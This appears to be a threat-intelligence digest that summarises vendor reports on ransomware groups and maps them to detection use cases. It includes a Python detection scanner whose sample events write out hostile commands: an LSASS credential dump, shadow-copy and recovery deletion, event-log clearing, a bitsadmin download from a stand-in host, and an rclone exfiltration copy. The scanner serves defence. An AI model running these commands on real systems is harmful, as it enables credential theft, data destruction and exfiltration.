Unraveling Wizard Spider’s Operations

May 24, 2022

Industry: N/A | Level: Tactical | Source: Hacker News

Intelligence collected by Prodaft revealed the nuances of the cybercriminal group Wizard Spider’s organizational structure and goals. The group’s financial success funds its research and development plans, and maintaining an effective toolset is a priority for the group. The team discovered a hash-cracking system capable of unraveling “LM:NTLM hashes, cached domain credentials, Kerberos 5 TGS-REP/AS-REP tickets, KeePass files, MS Office 2013 files, and other types of common hashes.” Additionally, a cold-calling system used to pressure non-responsive victims into complying with the group’s ransom demands was reviewed. Wizard Spider’s primary method of initial access is distributing spam emails containing Qakbot malware or proxy malware such as SystemBC. Additionally, the group was found to be leveraging an exploit kit incorporating the Log4Shell vulnerability. Once the network has been infiltrated, the threat group conducts reconnaissance to identify high-value targets. Cobalt Strike is deployed to assist with lateral movement, and the group prioritizes obtaining domain admin privileges so that it can deploy Conti ransomware. Various tools were identified as used by Wizard Spider, including numerous PowerShell scripts, Rubeus, SecretsDump, AdFind, Mimikatz, FileZilla, and Rclone.

Anvilogic Use Cases:

  • Executable Create Script Process
  • Rubeus Commands
  • Locate Credentials
  • Query Registry
  • NTDSUtil.exe execution
  • SecretsDump Credential Harvest
  • Adfind Execution
  • Adfind Commands
  • Mimikatz
  • Rclone Execution
  • Windows FTP Exfiltration

AvosLocker Infection with Abused Driver

May 10, 2022

Trend Micro observed an AvosLocker infection chain deployed within the US that abused a legitimate Windows driver for defense evasion and to disable security defenses.

Ransomware Attack Techniques

May 03, 2022

Industry: N/A | Level: Tactical | Source: Symantec

Symantec’s analysis of the ransomware groups Hive, Conti, and AvosLocker has identified frequently utilized tools, tactics, and procedures (TTPs). During the initial access stage of the attack, the ransomware operators leverage exploits, RDP with weak or compromised credentials, and malware deployment through phishing emails involving IcedID, Emotet, QakBot, or TrickBot. Persistence involved the use of third-party remote software such as AnyDesk and ConnectWise Control, along with modifications to the firewall and registry. Tools used for system discovery include ADRecon and Netscan. Credential access is achieved with a vast array of techniques involving Mimikatz, comsvcs.dll, extracting credentials from the registry, and using Task Manager to dump LSASS memory. Tools used for lateral movement include PsExec, WMI, BITSAdmin, and Mimikatz. Tampering with Windows logs helped cover the attackers’ tracks. Data recovery is inhibited by deleting shadow copies. Lastly, for data exfiltration, actors relied on Rclone and FileZilla to transfer data.

  • Anvilogic Use Cases:
    • Registry key added with reg.exe
    • Windows Firewall Rule Creation
    • Mimikatz
    • Invoke-Expression Command
    • comsvcs.dll Lsass Memory Dump
    • Rundll32 Command Line
    • Task Manager lsass Dump
    • Credentials in Registry
    • Remote Admin Tools
    • WinRM Tools
    • BITSadmin Execution
    • Clear Windows Event Logs
    • Inhibit System Recovery Commands
    • Suspicious Registry Key Deleted
    • Rclone Execution
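As an added example (not from the Symantec report and not Anvilogic’s own detection content), the following Python scanner shows how several of the use cases listed above can be expressed as command-line rules and run over process-creation events. The event records, the regular expressions and the correlation threshold are my own assumptions; the rule names are borrowed from the list above so the output maps back to it.

```python
import re
from typing import Dict, List, Tuple

# Detection rules keyed by use-case name. Each value is a list of
# case-insensitive regexes that must ALL match the process command line.
# The patterns are assumptions written for this example, not vendor content.
RULES: Dict[str, List[str]] = {
    "comsvcs.dll Lsass Memory Dump": [r"comsvcs\.dll", r"minidump"],
    "Inhibit System Recovery Commands": [
        r"(vssadmin(\.exe)?\s+delete\s+shadows"
        r"|wmic(\.exe)?\s+shadowcopy\s+delete"
        r"|bcdedit(\.exe)?.*recoveryenabled\s+no)"
    ],
    "Clear Windows Event Logs": [r"wevtutil(\.exe)?\s+(cl|clear-log)\b"],
    "BITSadmin Execution": [r"bitsadmin(\.exe)?\s+/transfer"],
    "Rclone Execution": [r"rclone(\.exe)?\s+(copy|sync|move)\b"],
}

# Constructed process-creation events (host, user, command line). These are
# made up for the example; they are not real telemetry from any incident.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws01", "user": "alice",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Temp\out.dmp full"},
    {"host": "ws01", "user": "alice",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},          # benign rundll32 use
    {"host": "srv02", "user": "svc_backup",
     "cmdline": r"vssadmin.exe delete shadows /all /quiet"},
    {"host": "srv02", "user": "svc_backup",
     "cmdline": r"vssadmin.exe list shadows"},                        # benign enumeration
    {"host": "srv02", "user": "svc_backup",
     "cmdline": r"wevtutil.exe cl Security"},
    {"host": "dc01", "user": "admin",
     "cmdline": r"wevtutil.exe qe Security /c:5"},                    # benign query
    {"host": "ws03", "user": "bob",
     "cmdline": r"bitsadmin.exe /transfer job /download /priority high http://example.invalid/a.bin C:\Users\Public\a.bin"},
    {"host": "ws03", "user": "bob",
     "cmdline": r"rclone.exe copy C:\Share remote:bucket"},
    {"host": "srv02", "user": "svc_backup",
     "cmdline": r"bcdedit.exe /set {default} recoveryenabled No"},
]


def match_rules(cmdline: str) -> List[str]:
    """Return the names of every rule whose patterns all match the command line."""
    hits = []
    for name, patterns in RULES.items():
        if all(re.search(p, cmdline, re.IGNORECASE) for p in patterns):
            hits.append(name)
    return hits


def scan_events(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Run every rule over every event; yield (host, user, rule) alerts."""
    alerts = []
    for ev in events:
        for rule in match_rules(ev["cmdline"]):
            alerts.append((ev["host"], ev["user"], rule))
    return alerts


def hosts_with_multiple_stages(alerts: List[Tuple[str, str, str]], min_rules: int = 2) -> List[str]:
    """Hosts on which at least `min_rules` DISTINCT rules fired.

    A single hit (e.g. one shadow-copy deletion by a backup job) is often noise;
    several distinct ransomware-playbook stages on one host are worth an
    incident, which is the correlation this helper expresses.
    """
    per_host: Dict[str, set] = {}
    for host, _user, rule in alerts:
        per_host.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in per_host.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for host, user, rule in found:
        print(f"[{rule}] host={host} user={user}")
    print("hosts with multiple stages:", hosts_with_multiple_stages(found))
```

Each rule is deliberately narrow (the benign `vssadmin list shadows` and `wevtutil qe` lines do not fire), and the correlation step is what turns single noisy hits into a host-level finding; tune `min_rules` and the pattern list to the telemetry you actually collect.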

Red Canary’s Intelligence Insights

May 03, 2022

Industry: N/A | Level: Tactical | Source: RedCanary

Red Canary’s intelligence insights on threats observed during March 2022 identified a shift in rankings: SocGholish, previously the top threat, slipped to #8 on the list and Impacket claimed the top spot. The top five threats (highest to lowest) are Impacket, Mimikatz, Yellow Cockatoo, Cobalt Strike, and BloodHound. Additionally, Emotet rose to 6th on the threat list (previously #8) and Qbot/Qakbot dropped to 9th (previously #4). In April 2022 the Qbot malware was observed adjusting its delivery techniques to incorporate Windows Installer (MSI) packages, where it previously used malicious Office macros and compressed zip files. Microsoft’s decision to block VBA macros by default, since January 2022, has caused threat actors to adjust.

  • Anvilogic Use Cases:
    • Suspicious Email Attachment
    • Compressed File Execution
    • MSIExec Install MSI File

Hive Ransomware Attack Analysis

April 26, 2022

The Varonis Forensics Team has provided an investigation of an incident involving Hive ransomware that took under 72 hours to execute. The attack began by exploiting the Exchange ProxyShell vulnerability to load a webshell on the Exchange server.

eSentire Conti Leaks Analysis

April 05, 2022

Industry: N/A | Level: Tactical | Source: eSentire

eSentire’s Threat Response Unit (TRU) dove into Conti intrusion procedures, sharing detection tactics derived from the group’s 2021 and 2022 data leaks, which contain operation manuals and chat logs. The chat logs from the February 2022 data leak often reference manuals that help Conti operators carry out their operations. The ransomware gang operates with a clear structure: a management chain, organized personnel with roles and responsibilities, and training programs. The reference materials help ensure Conti operators initiate their threat activity with consistency and efficiency. Analysis of the tooling identified reliance on many well-known tools and techniques, including AdFind, Cobalt Strike, Mimikatz, PowerView, 7-Zip, AnyDesk, Rubeus, Rclone and native living-off-the-land binaries (LOLBins).

  • Anvilogic Scenario: ZeroLogon Compromise
  • Anvilogic Use Cases:
    • Adfind Commands
    • Adfind Execution
    • Common Reconnaissance Commands
    • Cobalt Strike Beacon
    • Cobalt Strike style Shell invocation
    • Create/Add Local/Domain User
    • Locate Credentials
    • Mimikatz
    • Modify Group Policy
    • Native Archive Commands
    • Potential Web Shell
    • Registry key added with reg.exe
    • Rclone Execution

UNC2596 & Cuba Ransomware

March 01, 2022

Industry: Construction Engineering, Education, Energy, Financial, Government, Healthcare, Legal, Manufacturing, Media, Oil, Technology and Transportation | Level: Tactical | Source: Mandiant

Mandiant reports activity from the threat group UNC2596, which deploys Cuba/COLDDRAW ransomware by exploiting the Exchange vulnerabilities ProxyShell and ProxyLogon. The threat group has targeted over 10 countries, with 80% of the victim organizations based in North America. Targets spanned many verticals, including construction engineering, education, energy, financial, government, health care, legal, manufacturing, media, oil, technology and transportation. The threat group’s extortion model incorporates a shaming website, used against victims since 2021. UNC2596’s tactics have included Mimikatz and user account creation for privilege escalation. Reconnaissance has involved a ping-sweeping tool and a PowerShell script that uses “Get-ADComputer”. Lateral movement is facilitated with RDP, SMB, and PsExec. UNC2596 completes its operation by collecting, encrypting and exfiltrating data using batch scripts.

  • Anvilogic Use Cases:
    • Potential ProxyShell
    • Potential PHP Webshell
    • Mimikatz
    • Create/Add Local/Domain User
    • Potential Ping Sweep
    • Common Active Directory Commands
    • Remote Admin Tools
    • RDP Hijacking

FBI Flash Report for LockBit 2.0

February 15, 2022

Industry: N/A | Level: Tactical | Source: IC3

The FBI released details on the Ransomware-as-a-Service (RaaS) LockBit 2.0, which has been active since September 2019. The threat group’s initial access vectors include purchased access, exploitation of vulnerabilities, insider threats, and zero-day exploits. The group has a large arsenal of private and public tools, using the public tool Mimikatz to escalate privileges. Upon execution, the LockBit 2.0 ransomware performs a system language check to ensure the target is not “Eastern European”; if it is, the malware exits the infection routine. The documented infection routine begins as follows: “Lockbit 2.0 deletes log files and shadow copies residing on disk. Lockbit 2.0 enumerates system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. Lockbit 2.0 attempts to encrypt any data saved to any local or remote device, but skips files associated with core system functions. Once completed, Lockbit 2.0 deletes itself from disk and creates persistence at startup.” For data exfiltration the group uses a variety of publicly available tools such as Rclone and MEGAsync, as well as public file-sharing services.

  • Anvilogic Use Cases:
    • Mimikatz
    • New AutoRun Registry Key
    • Rclone Execution

Midas Ransomware

February 01, 2022

Industry: Technology | Level: Tactical | Source: Sophos

Sophos reported the deployment of Midas ransomware against a technology vendor in December 2021. A review of the threat indicators showed the attackers were active on the network for at least two months, with the earliest indicator of compromise found on October 13th, 2021. The organization’s network was unfortunately a flat topology with no network segmentation. The attackers also took advantage of the commercial remote access tools AnyDesk and TeamViewer to move laterally in the network; the organization had previously used the software for tests but had not uninstalled it from the servers. Sophos identified a unique aspect of the compromise: the attackers crafted and installed PowerShell scripts as services prior to deploying the ransomware, activity that was carefully engineered during the two months they were on the network. Due to a visibility gap, it is unknown how the attackers accessed the domain controller or obtained admin permissions. Threat activity progressed slowly from October 13th to November 2nd, picked up again on November 25th, and culminated in ransomware deployment on December 7th. Observed activity on the network included using Process Hacker to identify processes, Mimikatz for credential harvesting, execution of scripts from TEMP and AppData directories, and exfiltration of data to a cloud service.

  • Anvilogic Use Cases:
    • Windows Service Created
    • Obfuscated Powershell Techniques
    • RDP Hijacking
    • Mimikatz
    • Executable Process from Suspicious Folder

Red Canary Intelligence Insights from October 2021

November 23, 2021

Industry: N/A | Level: Tactical | Source: RedCanary

Intelligence insights for October 2021, provided by Red Canary, show Mimikatz, Yellow Cockatoo/Jupyter infostealer and TA551 as the top three of the top five threats since August. Notable rises into the top ten threats are Qbot and WannaCry.

Anvilogic Use Cases:

    • Mimikatz
    • Certutil File Download
    • Windows Copy Files
    • Inhibit System Recovery Commands
    • Clear Windows Event Logs
    • Windows Firewall Disabled